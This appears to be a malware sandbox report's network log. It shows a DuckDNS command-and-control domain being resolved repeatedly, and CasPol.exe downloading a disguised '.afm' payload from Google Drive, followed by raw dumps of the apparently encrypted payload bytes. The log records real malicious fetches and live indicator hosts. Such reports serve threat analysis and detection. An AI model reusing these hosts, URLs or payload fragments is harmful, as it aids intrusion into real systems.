Nov 3, 2022 07:23:19.391164064 CET | 8.8.4.4 | 192.168.11.20 | 0x6871 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:23:36.136117935 CET | 8.8.4.4 | 192.168.11.20 | 0x60be | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:23:53.325628042 CET | 8.8.4.4 | 192.168.11.20 | 0xc8b3 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:24:30.295273066 CET | 8.8.4.4 | 192.168.11.20 | 0xf8a5 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:24:46.979331970 CET | 8.8.4.4 | 192.168.11.20 | 0x66a8 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:25:03.677933931 CET | 8.8.4.4 | 192.168.11.20 | 0xe79f | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:25:39.626437902 CET | 8.8.4.4 | 192.168.11.20 | 0x4d08 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:25:57.478291035 CET | 8.8.4.4 | 192.168.11.20 | 0x42fe | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:26:14.804553032 CET | 8.8.4.4 | 192.168.11.20 | 0xe123 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:26:50.892088890 CET | 8.8.4.4 | 192.168.11.20 | 0x4bbd | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:27:08.804120064 CET | 8.8.4.4 | 192.168.11.20 | 0xbb4b | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:27:25.737281084 CET | 8.8.4.4 | 192.168.11.20 | 0xdfc8 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:28:00.612746000 CET | 8.8.4.4 | 192.168.11.20 | 0x8e30 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:28:17.262226105 CET | 8.8.4.4 | 192.168.11.20 | 0x6830 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:28:33.913090944 CET | 8.8.4.4 | 192.168.11.20 | 0x3d83 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:29:08.797080994 CET | 8.8.4.4 | 192.168.11.20 | 0x307 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:29:25.467226028 CET | 8.8.4.4 | 192.168.11.20 | 0x4fab | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:29:42.119210958 CET | 8.8.4.4 | 192.168.11.20 | 0x79fd | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
                                                                        • drive.google.com
                                                                        • doc-10-90-docs.googleusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49840 | 142.250.186.78 | 443 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
2022-11-03 06:22:06 UTC | 0 | OUT | GET /uc?export=download&id=1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache
2022-11-03 06:22:06 UTC | 0 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Thu, 03 Nov 2022 06:22:06 GMT
                                                                        Location: https://doc-10-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633/*/1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: script-src 'nonce-G5O5ObcBrwbYyLIZwQq2Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 49841 | 172.217.16.193 | 443 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
2022-11-03 06:22:06 UTC | 1 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633/*/1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Host: doc-10-90-docs.googleusercontent.com
Connection: Keep-Alive
2022-11-03 06:22:07 UTC | 2 | IN | HTTP/1.1 200 OK
                                                                        X-GUploader-UploadID: ADPycduwE6yscNBUIq2I-1rqbMAM3xE0h8kK0DFSxb1V39jRiZvJh70ifN3yhKhK_iysTDJRK11nKrHuzFRSRG74aC09tj3DppCZ
                                                                        Content-Type: application/octet-stream
                                                                        Content-Disposition: attachment; filename="wdbNlGTYFBlXRFXi154.afm"; filename*=UTF-8''wdbNlGTYFBlXRFXi154.afm
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Credentials: false
                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, 
X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context
                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                        Content-Length: 207424
                                                                        Date: Thu, 03 Nov 2022 06:22:07 GMT
                                                                        Expires: Thu, 03 Nov 2022 06:22:07 GMT
                                                                        Cache-Control: private, max-age=0
                                                                        X-Goog-Hash: crc32c=ptrZBA==
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                        Connection: close
                                                                        Data Ascii: {[/XNBDj4#^08)3^YwOVf/>.0X.[TN&1&=%^;r|77Pn}@]qP\@w:_8"!<B-#]S-+K MtQnPp<$(@MkL.[(YQO7,#2O;@,L3xEL_rqb
                                                                        2022-11-03 06:22:07 UTC51INData Raw: 63 13 f5 9c e7 04 26 80 be e9 bb 34 4d 20 da 62 91 03 31 43 6a 24 dd 45 fd 61 66 77 6a ac 90 e9 e5 ae 6d 5a 68 2d 03 42 c3 46 b1 ff 8d 9d 57 e0 88 fb d3 74 8b ea 78 5a d1 3f 22 4b 64 5c 4c 16 86 ec 87 41 62 ab 62 d9 32 de 11 3f df e3 35 90 ee b4 d6 08 95 ac c9 fc b5 74 85 98 0c 4a 92 51 9a 9b 77 ed e8 68 ab df 0d 5c e3 8b 20 57 8c 28 3d f0 23 c6 32 80 e3 06 66 de e5 e5 11 2a 1f 16 1b 47 84 f8 cf 60 d3 3c b3 a0 ff d7 9c de 5d 55 10 b8 ac d8 b2 d7 a6 dd 0c 77 e1 2d 62 8e f5 7e 41 12 e3 f8 8d 33 5a 6a c5 f9 0e 55 19 23 37 5f 4b c5 02 9b df de 5c 18 24 cf 5f 7e 6a 3f e9 13 71 27 59 90 88 b8 e1 b3 a6 c8 84 e2 5e 9e c8 18 31 35 3f f0 e8 cb de cf 08 f6 18 11 4d c0 8e c3 8e a0 e0 f5 3d 56 3f 4d a6 8c 0f df cd c9 60 84 d3 77 ce bc 13 91 bf 4e 30 c4 97 89 75 a7 41
                                                                        Data Ascii: c&4M b1Cj$EafwjmZh-BFWtxZ?"Kd\LAbb2?5tJQwh\ W(=#2f*G`<]Uw-b~A3ZjU#7_K\$_~j?q'Y^15?M=V?M`wN0uA
                                                                        2022-11-03 06:22:07 UTC52INData Raw: 02 a5 30 4d bf 43 b2 e9 7d 73 00 b8 f0 3b 3b cb 0a 7f 4e c6 5c b6 87 ce 5c 22 68 75 a1 e1 87 79 5f 91 24 43 8b d4 48 e5 75 a8 d8 1b c1 8e 0a b0 5a 70 52 26 d3 8b 5d d4 34 f4 1c 44 74 b0 00 c3 fa c0 6c aa 67 17 cc da b7 b4 ff 8b 06 c0 b1 75 5b b4 4e a9 57 cf 08 e7 0b fe 4b 79 b8 f9 99 7a 5f 09 7d 0e 27 0b 3b 61 cd 09 44 71 16 88 38 15 b4 6d c1 e0 e0 98 11 20 76 4a de 27 82 cd 0b 2f 59 05 72 a8 84 da 52 e5 3c 9f b4 8b 21 85 27 d6 b5 d6 e8 d2 47 d5 fd 39 e6 ad b7 86 96 35 7d 7d 0e 15 0e fb 12 09 e8 1c d1 df ea 26 9a df df cd 51 43 19 b6 89 2d be ce 68 e3 8f 7b a6 84 d4 24 e7 84 c0 08 71 b7 15 97 7e 3a 0c 15 ea 41 95 a8 e5 00 07 e0 20 61 e8 49 34 fd f8 f2 bb 3f 66 36 c4 cf bb 0a 35 ba 99 db 53 37 22 55 41 94 20 d1 bb f6 ee 07 6e 4d bb ef 46 37 3a 19 72 c8 93
                                                                        Data Ascii: 0MC}s;;N\\"huy_$CHuZpR&]4Dtlgu[NWKyz_}';aDq8m vJ'/YrR<!'G95}}&QC-h{$q~:A aI4?f65S7"UA nMF7:r
                                                                        2022-11-03 06:22:07 UTC53INData Raw: e7 ee 99 d6 13 07 4b 49 8e a4 36 77 08 c9 ce 1c 8b b5 0a 15 54 82 6f 30 d8 ef 23 07 f0 da 15 cb b5 e3 93 3e 4f e1 e1 7c 66 34 41 ae 3a a2 92 35 4a 5b 65 d9 da 0f 3f e6 19 f7 b4 83 2f 2a f0 e3 ec 66 25 00 18 d4 7e fa cf 20 12 e1 f9 e0 ba 37 15 05 9c 94 4c f7 de 2e d6 3b e2 1a 9f 22 1a c1 a2 8c ca d7 bd 2d 6e 7d f0 e5 5a c9 31 21 fe 79 44 58 9d 34 7f 1a dd 8a bd d5 e6 61 85 02 26 4e 69 ab b6 0e 57 61 e8 2f 25 7a aa a4 de 97 33 53 16 32 56 ef e9 6a b8 2d 2e ea b4 46 b9 70 c1 60 1c 28 2d 4b eb 1c cf cf c7 29 0a 7a 4a 35 f3 e8 cf 67 a3 c0 7a e4 9d 2a 8e b0 3e a3 42 2f 61 b1 98 e5 ca 5b 2c 1a 46 df e4 0a 5f cf b5 5a 73 79 40 b1 f0 a7 f1 a8 73 3a 1b 3f a1 8e 11 81 f8 5e d9 7b 6e b6 c1 db 7f d3 00 fd d8 21 14 0c 6d 22 1a b5 fa 2d 44 fe ea e3 8b 21 03 55 9b 28 a9
                                                                        Data Ascii: KI6wTo0#>O|f4A:5J[e?/*f%~ 7L.;"-n}Z1!yDX4a&NiWa/%z3S2Vj-.Fp`(-K)zJ5gz*>B/a[,F_Zsy@s:?^{n!m"-D!U(
                                                                        2022-11-03 06:22:07 UTC54INData Raw: 30 39 29 87 f9 a9 77 51 7d 0f 58 e3 f0 c2 22 2b 56 0f 70 9a 56 fd 05 c9 b5 2a ed 31 5b be 37 9a a3 ac 75 00 1c 9f 31 3a cd dd bf 66 79 8c b1 87 12 b8 e7 68 73 a6 19 af 76 a0 96 24 57 b4 db 49 e4 2f 78 f4 98 c1 8f 0a 5c 75 f7 53 27 73 83 70 7e 36 f5 1c 60 5d 3a 01 c2 fe 80 41 25 7c 16 cc 3e 9d 18 fe 8a 27 c0 81 c5 49 a2 4e 80 67 19 09 f1 0d bb 7a af bb ef 99 0f 72 e9 7c 18 22 9a 0a 8d ca 18 44 dc 25 4c 38 04 b4 b0 e1 24 e1 89 11 2d 44 8e d4 36 70 f0 30 ea 53 13 41 c4 bf 6b 59 f3 04 03 c2 20 2b 93 4c 1a c3 7d e2 c3 3a 29 8b cc ed bb 30 9e e1 3b 76 6b 9d 21 79 f5 19 1f 43 4c a6 d4 e1 30 2b 5f 56 35 5a 55 c1 2a 94 29 b6 d8 98 5b 92 76 a2 92 df f3 c0 8b c4 1e 55 44 32 84 6a 2b 3c 36 9b 49 82 be ab 3f 6a f4 34 77 87 12 59 55 ee e4 c0 48 0b 9e d2 d9 31 ad 98 c8
                                                                        Data Ascii: 09)wQ}X"+VpV*1[7u1:fyhsv$WI/x\uS'sp~6`]:A%|>'INgzr|"D%L8$-D6p0SAkY +L}:)0;vk!yCL0+_V5ZU*)[vUD2j+<6I?j4wYUH1
                                                                        2022-11-03 06:22:07 UTC56INData Raw: 34 70 d3 9c 3b 26 36 b9 e8 75 c5 20 8f 67 1c fc db 5f 35 cc e5 3e e4 24 f7 5c e3 c0 d6 15 01 f2 b7 cd c3 30 75 a0 20 b6 1c 8d b5 ba 1e 0d 0b 72 4a 14 e0 7a 17 d4 da fe c6 ec e5 95 87 a1 6c b8 7e 60 50 9e a3 63 a2 9c 24 48 50 3d 5e d4 0c 31 7c 7e f7 ba 83 39 25 b4 b2 fe e9 06 0a 5c 00 53 fa e7 2e 56 a7 f5 7d 9b ae 51 00 92 94 3d f9 9a 2e d8 7d 85 d4 c7 be 14 c7 d2 9e aa d7 b3 2d ec f0 b4 29 48 69 ab 29 ba 4d 6e 58 34 3a 3b 5c df 62 a1 73 5d 69 85 52 02 4e 68 ab b7 08 4f 93 f2 48 e1 72 aa c8 33 96 32 53 17 74 54 73 e5 fd 4c 25 2e 72 59 47 b8 70 c3 26 1b e9 31 d7 fb 14 cf 7b 2a 28 0c 7a 42 b6 f6 e4 d2 c7 e3 c8 7a 28 70 2b 89 b0 34 e5 45 c6 7d 17 c4 ed ca b3 c1 1b 4f df f7 1b 5f e7 a8 dd 0b 71 40 a9 1c a6 f8 a8 69 3b 1a 4b bc 01 b9 86 f8 1a 35 7a 65 b6 e0 cd
                                                                        Data Ascii: 4p;&6u g_5>$\0u rJzl~`Pc$HP=^1|~9%\S.V}Q=.}-)Hi)MnX4:;\bs]iRNhOHr32StTsL%.rYGp&1{*(zBz(p+4E}O_q@i;K5ze
                                                                        2022-11-03 06:22:07 UTC57INData Raw: b7 ec 82 f7 ff 01 33 c0 4c 88 41 ab f2 97 94 9c a3 2b b7 24 b7 c8 33 71 ee ef 97 0d b2 fd fd 8c 42 57 0e 5e e3 e7 f7 39 f3 67 4b 7b e8 91 f9 2c c9 f1 02 a7 26 4d b7 7b f6 e9 f8 73 24 f8 b7 3b 3b cb cc 7f 77 fe c8 b7 d2 ce 68 63 68 75 a6 e1 91 79 c8 a8 60 43 c8 d4 9c a4 2f a8 d8 1b d1 8e a7 88 1d 70 07 26 b7 c9 5d d4 36 f4 0d 44 ad 88 44 c3 ab c0 5c e9 7d 17 cc da a3 b4 f2 b2 63 c0 e4 75 98 f7 4e a9 56 cf 19 e7 30 c7 77 7b ef f9 79 3e 43 09 7d 0e 33 0b 56 58 7f 09 11 71 4c cd 38 15 b4 6d c1 e0 58 a1 a5 20 20 4a 94 61 70 cd 02 2e 42 05 44 93 cd d9 0f e5 e0 d8 f0 8a 2b 85 5d d7 c4 ed a6 d2 6d d4 51 7e ec ad 30 87 c3 34 12 47 d8 16 1d fa 34 4e 43 1d 95 de f1 26 b6 e4 2b ce 03 43 4d f0 a7 2d b4 ce 89 e2 50 41 e4 84 85 26 d3 ce c6 08 55 b5 10 95 5d 01 78 17 f5
                                                                        Data Ascii: 3LA+$3qBW^9gK{,&M{s$;;whchuy`C/p&]6DD\}cuNV0w{y>C}3VXqL8mX Jap.BD+]mQ~04G4NC&+CM-PA&U]x
                                                                        2022-11-03 06:22:07 UTC58INData Raw: 54 1f 7c 62 21 94 d5 f3 b1 a7 4b 2c cd ce fa 71 68 b5 c7 c7 ae ae 3e b9 dc 34 f4 be 84 c8 3c 51 a8 ea 34 0c 45 8f c1 1c 30 b3 5f cc d6 8e 2f ee 55 6e 50 e0 66 d6 f5 6c ea 44 d7 a4 21 7f 39 95 d3 1c 2a b5 aa 74 0d 82 69 30 05 ea df 56 db d9 59 c6 c8 8f 95 3e ba ec a9 74 ad 65 f8 a3 cb a2 b0 59 48 55 21 d9 c5 07 e8 b9 70 f4 12 83 79 48 b4 e3 e2 66 17 06 b9 85 34 fa 4e 2e 56 e1 f7 e0 07 39 47 25 63 c5 2b fa 33 2e d8 3b 87 14 5b 22 02 e1 ef d0 b9 d4 19 2d ec 73 b4 e5 d4 c9 bd 0f d7 2b 71 5b 9e 3a 3b 1a dd 8a 3d d5 4b 4f 58 50 64 4d c5 ab b7 0e 57 60 68 2f f7 54 bf f7 50 95 9c 53 17 32 56 ee 79 6a 5a 03 ab b9 2d 44 09 70 c3 60 19 29 ad 4b ed 33 c6 9b 57 2b b8 7a 42 35 f6 e9 4f 67 f5 ef d3 b0 36 28 31 b0 34 a3 47 2e e1 b1 d2 ca b3 0e 88 18 f2 df f7 0a 5f ce 35
                                                                        Data Ascii: T|b!K,qh>4<Q4E0_/UnPflD!9*ti0VY>teYHU!pyHf4N.V9G%c+3.;["-s+q[:;=KOXPdMW`h/TPS2VyjZ-Dp`)K3W+zB5Og6(14G._5
                                                                        2022-11-03 06:22:07 UTC59INData Raw: 3e 47 25 c3 a3 37 d3 d0 57 81 86 22 01 b6 b1 5e 97 63 c7 5f 01 5b 52 48 71 f3 fa d6 de 8c 4a 31 d4 4d 7c d9 ab af a0 d0 8a f7 5e a4 5c b7 dd 32 7d 72 ef 1a 3a 86 ee b1 84 68 2e 0e 4b e2 b3 6a 39 2a 50 0f 6d bd a0 8d 69 cd e4 03 bb bd 4d be 43 b2 f8 ad 1a 70 3b b3 2d 3a cb dd 7f 4e c5 8c b1 9f 3d 8a cd 68 62 a7 e1 87 79 a1 93 24 05 9e 2a 69 6f 2b b1 d9 1b c0 8e 0a b3 59 36 51 a0 51 75 5d cf 37 f4 1c 44 70 b3 00 85 fd 00 4e cd 7d 0b cd b2 3f b4 ff 8b 27 c6 a9 86 52 27 4a b5 57 43 85 e7 0d fe 4b 1f b9 c1 a9 c5 42 14 7c fa af 0b 3b 61 cb 0f 44 a8 65 4d 39 0a b5 ed 5e e0 e1 98 11 46 75 a8 e4 1a 71 ec 03 fe dd 05 41 a9 8d bd 5b 0b 34 55 f1 a8 2a f5 c3 d7 f1 d7 e2 d4 22 27 a3 5f ec 8f 31 0b 5d 34 77 7d 9d 12 52 09 02 d7 43 3f 94 6e 6f 26 2b de 65 aa 58 83 e3 29
                                                                        Data Ascii: >G%7W"^c_[RHqJ1M|^\2}r:h.Kj9*PmiMCp;-:N=hby$*io+Y6QQu]7DpN}?'R'JWCKB|;aDeM9^FuqA[4U*"'_1]4w}RC?no&+eX)
                                                                        2022-11-03 06:22:07 UTC61INData Raw: eb a6 3e 41 ce c9 ff 1c a6 cb cf a7 73 6f 55 ec ba d7 23 75 3f d7 51 a2 b0 51 52 7d 76 98 94 68 83 c1 a3 ef 2c a8 56 ff 3f 69 f5 79 c7 5b de 13 bc 79 78 fd 2c 81 87 3d 3d 16 ea 75 7d 01 89 67 98 71 21 5a 9c d7 16 91 e6 24 1f 7d e5 c0 06 98 07 ec 15 d6 60 9f 77 a0 e4 97 1a 8d a9 34 18 0b d0 68 c0 bb e2 7a 27 f6 dc fe ae 62 e4 93 6d bb f0 08 7c 60 14 bc a5 63 16 12 32 4e 01 20 91 64 0f 31 c8 5d f1 ba 83 b6 2a b2 b6 e3 12 b6 0e 5c f4 70 fc e7 62 d9 ef f1 b6 86 99 e1 05 92 b4 19 ff 9a b6 57 2e 81 43 da ee a4 c1 d2 a2 8e d1 b3 c9 63 66 b2 bd 55 31 1b 2f ba 79 4a 5e 34 0a ab 23 dc d3 bc c1 ec 6f 85 02 26 48 68 e7 27 23 56 39 e9 67 50 74 aa a4 17 90 32 d7 87 ae 56 b4 f8 0e fd 23 2e ea 7d 41 b8 d0 53 f8 18 73 2c e7 4a 13 cf cf 0e 2e 0c a2 d2 a9 f6 b2 ce af 52 cf
                                                                        Data Ascii: >AsoU#u?QQR}vh,V?iy[yx,==u}gq!Z$}`w4hz'bm|`c2N d1]*\pbW.CcfU1/yJ^4#o&Hh'#V9gPt2V#.}ASs,J.R
                                                                        2022-11-03 06:22:07 UTC62INData Raw: 9e ee 28 21 e7 e4 b4 fc ad f0 5c d5 75 1a 82 b9 3f 83 dc 2d d1 67 f8 44 1f 03 2a 4f c1 b4 c5 55 b7 57 41 87 22 17 b6 6c 33 e7 27 d7 a0 e8 d8 55 8a 70 f3 ec d6 f7 e0 3a 75 c3 ca aa ae ab 69 a1 d0 9c f7 2b c8 18 f1 cb f3 53 e1 e8 dd 3b ae 3b a9 8c 72 6a 08 46 10 fd 81 39 e3 51 8f bf bd 91 fd 13 5f f1 0f 01 74 4d 77 42 26 2d ad 73 00 b8 b6 3b 29 6d f7 78 87 c7 24 73 87 ce 90 23 69 75 dc 47 b5 7e 6a 91 24 43 9c d4 b4 fd 2f a8 d9 1b 29 95 0a b0 58 70 67 3a 73 8b 5c d4 b7 e8 1c 44 71 b0 a4 df fe c0 6d aa 8c 0b cc da b3 b4 a6 96 27 c0 b0 75 ed a9 4e a9 57 cf 59 f9 0d fe 4a 79 27 e7 99 7a 42 09 94 10 22 0b 3a 61 fe 16 44 71 15 88 b9 0a b4 6d d1 e0 2c 87 11 20 77 4a 5d 07 70 cd 00 2e f6 25 41 a9 8e db 99 c5 04 9e f1 8a d2 a5 4c d7 f3 d7 cb f3 3a d4 b8 38 99 8c 30
                                                                        Data Ascii: (!\u?-gD*OUWA"l3'Up:ui+S;;rjF9Q_tMwB&-s;)mx$s#iuG~j$C/)Xpg:s\Dqm'uNWYJy'zB":aDqm, wJ]p.%AL:80
                                                                        2022-11-03 06:22:07 UTC63INData Raw: c5 ca 95 d0 56 de 28 54 a8 8e 9c 09 d4 e8 d8 0e 4a ca ee 87 18 1d 9b f3 1c 57 d1 6b 41 ee c8 f9 0d 98 47 24 a0 3f 43 eb 42 ba d4 03 3c 6f d7 e5 2a 42 31 49 7c 62 32 94 e9 f5 c1 a5 ee 2c e8 f2 fa 71 6a b5 3f 91 5b fe 10 ba 7c 63 70 d5 80 c8 1d 06 b9 ea 70 5d 3c d8 67 1c fa d8 06 9b d6 8e 3f e6 b5 68 7d e3 c1 d6 dc 50 ea 44 d5 a4 d5 20 a0 c4 94 1c 8c ed ba 18 09 82 74 68 14 e2 7b 07 a3 82 fe c6 ee e3 e4 66 ba ec b9 7c c9 6c bc a3 61 a2 59 6d 48 55 20 d9 29 57 31 e8 5c f7 eb da 39 24 b5 e3 a7 3c 06 0e 5d d4 e1 a0 e7 2e 57 e1 06 ba 87 39 50 05 af cf 19 f9 9b 2e 51 60 87 14 da 22 fd 9a d2 82 8f d7 86 71 ec 73 b5 e5 d5 95 ab 2f b8 79 d7 04 34 3a 3a 1a 34 d6 bd d5 5f 6f 80 5f 26 4e 6b ab 96 53 57 60 ec 2f dc 29 aa a4 16 96 bb 0e 17 32 54 ee 5c 37 4c 23 2d ea bc
                                                                        Data Ascii: V(TJWkAG$?CB<o*B1I|b2,qj?[|cpp]<g?h}PD th{f|laYmHU )W1\9$<].W9P.Q`"qs/y4::4_o_&NkSW`/)2T\7L#-
                                                                        2022-11-03 06:22:07 UTC64INData Raw: f4 5c 05 d1 ad 48 05 1d a5 4c cd b2 b8 c7 ec 5d 1f 7b ec 18 8d 92 e0 dd c4 d8 ec ae 6b 84 e4 09 ff ad 74 c1 d5 76 1b c4 bf 61 a1 63 2a 6f 47 66 44 1f 01 29 72 59 ac 36 4e 59 0e 1f 86 22 15 b6 19 ae e7 61 d7 5e 6c 4c 52 48 70 f3 39 48 f7 e3 3b 33 c5 d3 88 50 aa af 81 4f 9c f7 29 cb 25 28 c8 33 70 f8 b6 85 3a 86 fd a9 f9 ed 6a 0e 5d e3 76 79 39 2a 54 0f ba 22 91 fd 12 c9 00 9d a7 30 4c be 62 12 e9 ad 71 00 85 17 3b 3b ca dd 26 ee c6 8c b5 87 bb 30 23 68 74 a6 70 27 79 a1 92 24 ee 3d d4 48 e6 2f 61 78 1b c0 8a 0a 55 f9 70 52 23 73 e3 72 d4 36 f5 1c 51 d1 b0 00 c2 fe 85 cd aa 7d 15 cc bb 13 b4 ff 88 27 bd 10 75 48 b5 4e 30 f7 cf 08 e5 0d 4b ea 79 ba f8 99 ab e2 09 7d 0c 22 e6 9a 